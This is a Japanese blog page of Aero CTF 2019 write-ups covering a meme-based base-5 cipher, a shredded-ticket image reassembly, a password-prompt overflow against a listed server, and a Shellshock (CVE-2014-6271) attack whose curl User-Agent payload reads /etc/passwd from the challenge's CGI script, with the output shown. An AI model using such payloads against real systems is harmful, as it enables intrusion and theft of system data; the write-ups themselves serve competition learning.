Aero CTF 2019

Aero CTF 2019 writeup crypto_warmup

crypto_warmup

100

Опять эти мемы, мы уже даже перестали что-либо им говорить. Просто посмотрим на это, они похоже сошли с ума.

Again, these memes, we have even stopped talking to them. Just look at it, they seem to be crazy.

file - MEGA

file - Google Drive

38行あるので1行1文字でフラグを表していると考えられます。また登場する単語が5種類なので5進数と考えてみます。
文字 10進数 5進数
A 65 230 kappa_pride pepe kappa 
e 101 401 look_at_this_dude kappa trollface 
r 114 424 look_at_this_dude kappa_pride look_at_this_dude 
o 111 421 look_at_this_dude kappa_pride trollface 
{ 123 443 look_at_this_dude look_at_this_dude pepe 
以上より復号するPythonプログラムを書きます。
import sys

d = {"kappa": 0, "trollface": 1, "kappa_pride": 2, "pepe": 3, "look_at_this_dude": 4}
f = open('meme_or_not')
l = f.readlines()
f.close()
for s in l:
a = s.rstrip('\n').split()
c = 0
for i in a:
c = c * 5 + d[i]
sys.stdout.write(chr(c))
実行するとフラグが出力されます。
$ python aaa.py
Aero{7a911ccfb18c2fafe2960b6ee2cbc9c7}
フラグは、
Aero{7a911ccfb18c2fafe2960b6ee2cbc9c7}
です。

現代暗号の誕生と発展
岡本 龍明
近代科学社
2019-02-01


Aero CTF 2019 writeup damaged ticket

damaged ticket

150

Я ненадолго оставил свой компьютер без присмотра и не заблокировал его. На рабочем столе у меня был билет на самолёт, кто-то повредил его и теперь у меня лишь мелкие части билета, как-будто он прошёл через "шредер". Помогите мне восстановить билет, у меня самолёт через пару часов!

I left my computer unattended for a while and did not block it. I had a plane ticket on the desktop, someone had damaged it and now I have only small parts of the ticket, as if it had passed through a "shredder". Help me recover the ticket, I have a plane in a couple of hours!

file - Mega

file - Google Drive

解凍すると大量のpngファイルができます。ファイル名は0~599のMD5ハッシュ値のようです。0~599を順番に左から右に画像連結するPythonプログラムを書きます。
import hashlib
from PIL import Image

def get_concat_h(im1, im2):
    dst = Image.new('RGB', (im1.width + im2.width, im1.height))
    dst.paste(im1, (0, 0))
    dst.paste(im2, (im1.width, 0))
    return dst
    
h = hashlib.md5(str(0)).hexdigest()
im1 = Image.open('parts/' + h + '.png')
for i in range(1, 600):
h = hashlib.md5(str(i)).hexdigest()
im2 = Image.open('parts/' + h + '.png')
im1 = get_concat_h(im1, im2)
im1.save('aaa.png')
実行すると下図の画像ができます。

aaa

フラグは、
Aero{2c5afcd62a5851f744fd6adb60ae2345}
です。



Aero CTF 2019 writeup pwn_warmup

pwn_warmup

100

Теперь они сделали сервер с мемами, на нём есть авторизация. Посмотри можно ли её обойти.

Now they have made a server with memes, it has authorization. See if you can get around it.

Server: 185.66.87.233 5004

file - Mega

file - Google Drive

ncコマンドでサーバーに接続します。passwordの入力で適当に長い文字列を入力したらフラグが表示されました。
$ nc 185.66.87.233 5004
Memes server
Enter the password: 1234567890123456789012345678901234567890123456789012345678901234567890123465798013456789012345678901234567901234567980123465798465131165s46ds4f5sd4f6sd1f31sd3f1sd3f1sd1f3sd1f31sdg5r4g56re4g1561re351gre
here is your meme: Aero{d31d0c1f564273c9bf3f1d1e1540c100}
フラグは、
Aero{d31d0c1f564273c9bf3f1d1e1540c100}

Aero CTF 2019 writeup board tracking system

board tracking system

100

Мы разработали продвинутую систему отслеживания параметров борта, нет ли в ней уязвимостей?

We develop advanced board tracking system, is it vulnerable?

Site: http://81.23.11.159:8080/

URLにアクセスすると次のページが表示されます。

1

HTMLソースは次のとおりです。
<html>
<head>
<style>
body, pre {
    color: #7b7b7b;
font: 300 16px/25px "Roboto",Helvetica,Arial,sans-serif;
}
</style>
<meta name="generator" content="vi2html">
</head>
<body>
</br>
Welcome to control plane application of Aeroctf system.</br>
</br>
</br>
On a dashboard you can see loading our system</br>
</br>
Stats:
</br>
<iframe frameborder=0 width=800 height=600 src="/cgi-bin/stats"></iframe>
</body>
</html>
CVE 2014-6271の脆弱性があります。
$ curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd;'" http://81.23.11.159:8080/cgi-bin/stats

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Aero{c58b51bee681ba3aa3971cef7aa26696}
フラグは、
Aero{c58b51bee681ba3aa3971cef7aa26696}
記事検索
ギャラリー
  • TetCTF 2023 NewYearBot
  • UUT CTF writeup Find The Password
  • UUT CTF writeup The Puzzle
  • Hack Zone Tunisia 2019 writeup Microscope
  • Hack Zone Tunisia 2019 writeup Welcome
  • SwampCTF 2019 writeup Brokerboard
  • SwampCTF 2019 writeup Leap of Faith
  • SwampCTF 2019 writeup Last Transmission
  • CBM CTF 2019 writeup Long road
カテゴリー